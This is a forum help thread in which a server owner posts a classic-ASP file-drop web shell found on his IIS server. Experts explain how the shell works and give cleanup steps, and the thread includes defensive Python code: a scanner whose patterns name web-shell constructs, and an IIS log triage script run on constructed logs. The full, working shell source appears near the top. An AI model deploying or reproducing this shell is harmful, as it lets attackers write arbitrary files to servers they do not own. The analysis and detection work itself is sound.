Solved

IIS hack - can someone help decipher this text file left on my server?

Posted on 2013-01-15
Last Modified: 2013-01-16
I recently noticed a text file on my server. I'm having trouble deciphering it, and deciding my next steps.  I see no other files changed or added at that time.  Advice appreciated.

The .txt file is attached and code is below:

<%
on error resume next
%>
<%
if request("pass")="hack" then
session("pw")="go"
end if
%>
<%if session("pw")<>"go" then %>
<%="<center><br><form action='' method='post'>"%>
<%="<input name='pass' type='password' size='10'> <input "%>
<%="type='submit' value='Go!'></center>"%>
<%else%>
<%
set fso=server.createobject("scripting.filesystemobject")
path=request("path")
if path<>"" then
data=request("da")
set da=fso.createtextfile(path,true)
da.write data
if err=0 then
%>
<%="success"%>
<%else%>
<%="no"%>
<%
end if
err.clear
end if
da.close
%>
<%set da=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%="wenjianlujing:"&server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%="xitong:"&Request.ServerVariables("OS")%>
<%="<br>"%>
<%="WEBFWQ:"&Request.ServerVariables("SERVER_SOFTWARE")%>
<%="<br>"%>
<%="IP:"&Request.ServerVariables("LOCAL_ADDR")%>
<%="<br>"%>
<%=""%>
<%="<textarea name=da cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=save>"%>
<%="</form>"%>
<%end if%>
Attachment: test.txt
Question by:drelinger
7 Comments
 
LVL 51

Expert Comment

by:Steve Bink
ID: 38781228
The file looks for a form submission with a field named "pass".  If the "pass" field equals the string "hack", a session variable is set to "go".

Then it looks at the session variable.  If it is not "go", the script renders an HTML form to the user, including the "pass" field.

If the session variable is go, the script displays a different form.  The form includes some server-side information (script name, OS, etc.), a textbox named "path", and a textarea field named "da".  If this form is submitted (assuming the password check passed earlier), the contents of the field "da" from this form submission are written to the file specified in the field "path".  If the file specified in "path" already exists, it is overwritten.

This script is used to place arbitrary files on your server.  Theoretically, it could even be used to write executable files.  The script's ability to access protected areas will be determined by the security token of the user running IIS (generally, an IUSR_* account).  If you found this file on your server, it is very possible that you have other vulnerabilities or exploits installed, and that your server is currently being used to target your site's visitors for unpleasantness.
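The indicators Steve lists (error suppression, a password gate on a request field, FileSystemObject, CreateTextFile, server reconnaissance) are exactly what a quick sweep of a web root should look for. The Python scanner below is an added example, not code from this thread; its regexes, weights and threshold are this example's own heuristics (an assumption), tuned on the shell posted above, and the sample inputs are constructed. It goes one step beyond the posted shell by also catching the one-line eval(request(...)) variant, which has none of the FileSystemObject indicators.

```python
"""Heuristic scanner for classic-ASP file-drop shells (added example).

The patterns and weights are this example's own assumptions, tuned on the
shell posted above; they are not a published signature set. Sample inputs
are constructed.
"""
import os
import re

# (name, pattern, weight). Weak indicators (weight 1-2) are common in
# legitimate ASP; a file is flagged only when enough of them line up.
INDICATORS = [
    ("error_suppression", r"on\s+error\s+resume\s+next", 1),
    ("password_gate",     r"request\s*\(\s*['\"]pass(?:word|wd)?['\"]\s*\)\s*=", 2),
    ("filesystemobject",  r"scripting\.filesystemobject", 3),
    ("file_write",        r"\.(?:createtextfile|opentextfile)\s*\(", 2),
    ("wscript_shell",     r"wscript\.shell", 3),
    ("eval_of_request",   r"\b(?:eval|execute|executeglobal)\s*\(?\s*request\b", 5),
    ("server_recon",      r"request\.servervariables\s*\(\s*['\"](?:os|server_software|local_addr)['\"]", 1),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE), weight) for name, pat, weight in INDICATORS]
THRESHOLD = 5  # assumption: one strong indicator, or several weak ones together

def scan_text(text):
    """Score one file's contents; returns the matched indicator names too."""
    hits = [name for name, rx, _ in COMPILED if rx.search(text)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    return {"score": score, "hits": hits, "suspicious": score >= THRESHOLD}

def scan_tree(root, exts=(".asp", ".asa", ".aspx", ".inc", ".txt")):
    """Walk a web root and return {path: result} for every flagged file.

    .txt is included on purpose: the shell on this page was saved as test.txt.
    """
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    result = scan_text(fh.read())
                if result["suspicious"]:
                    flagged[path] = result
    return flagged

# Constructed samples: an excerpt of the posted shell, a benign page, and the
# one-line eval variant that the posted shell does not use.
SHELL_SAMPLE = """<%
on error resume next
if request("pass")="hack" then
session("pw")="go"
end if
set fso=server.createobject("scripting.filesystemobject")
set da=fso.createtextfile(path,true)
da.write data
Response.Write "xitong:" & Request.ServerVariables("OS")
%>"""
BENIGN_SAMPLE = """<%
Dim name
name = Request.Form("name")
Response.Write "Hello, " & Server.HTMLEncode(name)
%>"""
EVAL_SAMPLE = '<%eval request("cmd")%>'

if __name__ == "__main__":
    for label, sample in (("shell", SHELL_SAMPLE), ("benign", BENIGN_SAMPLE), ("eval", EVAL_SAMPLE)):
        print(label, scan_text(sample))
```

Point scan_tree at the site root (the directory the asker found test.txt in) and review every flagged path by hand; the threshold is deliberately low enough that a legitimate admin page using FileSystemObject for writes will show up, which is still worth a look after a compromise.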
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38781246
Where was this file located?
 
LVL 84

Expert Comment

by:Dave Baldwin
ID: 38781402
I agree with @routinet, it is a classic ASP file/program to write files on your server.
Author Comment

by:drelinger
ID: 38782803
file was located in website root directory. There are no other file changes at that specific time.
Can anyone suggest further steps I should take having found this file ?
 
LVL 51

Accepted Solution

by: Steve Bink (earned 2000 total points)
ID: 38782922
That really depends on how paranoid you want to be.

In my world, the server would be wiped ASAP, with all services moved to a replacement until such time as it was ready to resume service.  It wouldn't be long, since the server would be restored in full from the latest backup...you do have backups, right?

At the very least, you should begin by doing a code audit for any sites on the server.  The fact that they have access to write arbitrary files means they could theoretically write files and manipulate the meta data.  In other words, just because a file looks like it hasn't been modified, does not mean it is not modified.  One popular target is to inject obfuscated javascript just after the open body tag in HTML files.

And, of course, you need to audit the server itself.  Find out what services/DLLs/extensions are running on boot, and if they're supposed to be there.  It could have a back-door installed, or some other less-visible application designed to tamper with the network communications.

If you do nothing else, you'll need to find how that file got on the server, and close that door.  IME, most of these hacks are the result of brute-forced/dictionary'd FTP or publishing services.  Disable FrontPage/WebDAV extensions.  Force all FTP users to change their passwords, and enforce a level of password complexity.  Above all, audit the security of all user accounts associated with your web service in any way, including the system accounts.  Make sure they have the permissions they need, and nothing more.

The good news is that most incidents like this (again, IME) are drive-by attacks...fire and forget.  They find a vulnerable site (as opposed to targeting the server itself), drop some stealthy javascript redirects, and move on.  If you're on shared hosting, that is probably all it is.  If you host your own server, it is more likely to have been targeted instead of the site, but that pattern still fits.
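Two of the steps in the accepted answer, working out when the dropped file was first used and checking whether FTP was brute-forced, come down to reading the W3C logs IIS already writes. The Python below is an added example, not part of the answer; the log excerpts are constructed for it (their field sets are a subset of what IIS logs, chosen for the example), and the parser keys every record off the #Fields header, so it runs unchanged on whatever fields a real log has. It assumes the dropped file was requested at /test.txt, and that the FTP log records 530 for a failed PASS and 230 for a successful one.

```python
"""Triage IIS W3C logs: use of the dropped file, and FTP password guessing.

Added example, not from the thread. Log lines are constructed; the parser
relies only on the #Fields header, not on a fixed column layout.
"""
from collections import Counter

def parse_w3c(text):
    """Return one dict per record, keyed by the names in the #Fields line."""
    fields, records = None, []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # truncated or mangled record: skip rather than misalign
        records.append(dict(zip(fields, parts)))
    return records

def shell_activity(records, uri_stem):
    """Summarize requests to the dropped file: when, how often, and from where."""
    hits = [r for r in records if r.get("cs-uri-stem", "").lower() == uri_stem.lower()]
    if not hits:
        return None
    return {
        "first_seen": hits[0]["date"] + " " + hits[0]["time"],
        "last_seen": hits[-1]["date"] + " " + hits[-1]["time"],
        "clients": sorted({r["c-ip"] for r in hits}),
        "methods": dict(Counter(r["cs-method"] for r in hits)),
        # request("pass") in the shell also reads the query string, so a
        # password in cs-uri-query is direct evidence of the gate being opened.
        "password_in_query": sum("pass=" in r.get("cs-uri-query", "") for r in hits),
    }

def ftp_bruteforce(records, threshold=5):
    """Per client IP: failed PASS count, whether a login then succeeded, and
    what was uploaded (STOR) after that success. Only IPs at or over the
    failure threshold are returned."""
    state = {}
    for r in records:
        if r.get("cs-method") not in ("PASS", "STOR"):
            continue
        s = state.setdefault(r["c-ip"], {"failures": 0, "login_ok_after": False, "uploads": []})
        if r["cs-method"] == "PASS" and r["sc-status"] == "530":
            s["failures"] += 1
        elif r["cs-method"] == "PASS" and r["sc-status"] == "230" and s["failures"]:
            s["login_ok_after"] = True
        elif r["cs-method"] == "STOR" and s["login_ok_after"]:
            s["uploads"].append(r["cs-uri-stem"])
    return {ip: s for ip, s in state.items() if s["failures"] >= threshold}

# Constructed web log (W3C extended format, as written by IIS).
WEB_LOG = """#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2013-01-14 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2013-01-14 02:11:03 10.0.0.5 GET /default.asp - 80 - 203.0.113.7 Mozilla/5.0 200 0 0 15
2013-01-14 02:14:20 10.0.0.5 GET /test.txt - 80 - 198.51.100.23 Mozilla/4.0 200 0 0 3
2013-01-14 02:14:31 10.0.0.5 GET /test.txt pass=hack 80 - 198.51.100.23 Mozilla/4.0 200 0 0 8
2013-01-14 02:15:02 10.0.0.5 POST /test.txt - 80 - 198.51.100.23 Mozilla/4.0 200 0 0 12
2013-01-14 02:15:40 10.0.0.5 POST /test.txt - 80 - 198.51.100.23 Mozilla/4.0 200 0 0 9
2013-01-14 09:30:44 10.0.0.5 GET /index.asp - 80 - 203.0.113.9 Mozilla/5.0 200 0 0 20
"""

# Constructed FTP log: five bad passwords, then a good one, then an upload.
FTP_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status
2013-01-14 01:57:50 198.51.100.23 - 10.0.0.5 21 USER administrator 331 0
2013-01-14 01:57:51 198.51.100.23 administrator 10.0.0.5 21 PASS *** 530 1326
2013-01-14 01:57:53 198.51.100.23 administrator 10.0.0.5 21 PASS *** 530 1326
2013-01-14 01:57:55 198.51.100.23 administrator 10.0.0.5 21 PASS *** 530 1326
2013-01-14 01:57:57 198.51.100.23 administrator 10.0.0.5 21 PASS *** 530 1326
2013-01-14 01:57:59 198.51.100.23 administrator 10.0.0.5 21 PASS *** 530 1326
2013-01-14 01:58:30 198.51.100.23 administrator 10.0.0.5 21 PASS *** 230 0
2013-01-14 01:58:45 198.51.100.23 administrator 10.0.0.5 21 STOR test.txt 226 0
2013-01-14 03:00:00 203.0.113.50 bob 10.0.0.5 21 PASS *** 230 0
"""

if __name__ == "__main__":
    print(shell_activity(parse_w3c(WEB_LOG), "/test.txt"))
    print(ftp_bruteforce(parse_w3c(FTP_LOG)))
```

Feed it the concatenated logs for the site (and, separately, the FTP site) and compare the first_seen time of the dropped file against the file's own timestamps; if the log shows requests before the file's claimed creation time, the metadata was reset, which is the point made above about not trusting modification dates. Since the shell reads request("pass"), a password POSTed in the body never reaches the log, so treat the client list and method counts as the primary evidence and password_in_query as a bonus.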
 
LVL 22

Expert Comment

by:Rick Hobbs
ID: 38784322
Just to be sure, I would also run a reliable anti-spyware product like Malwarebytes.
 

Author Closing Comment

by:drelinger
ID: 38784446
Great advice. thank you very much.
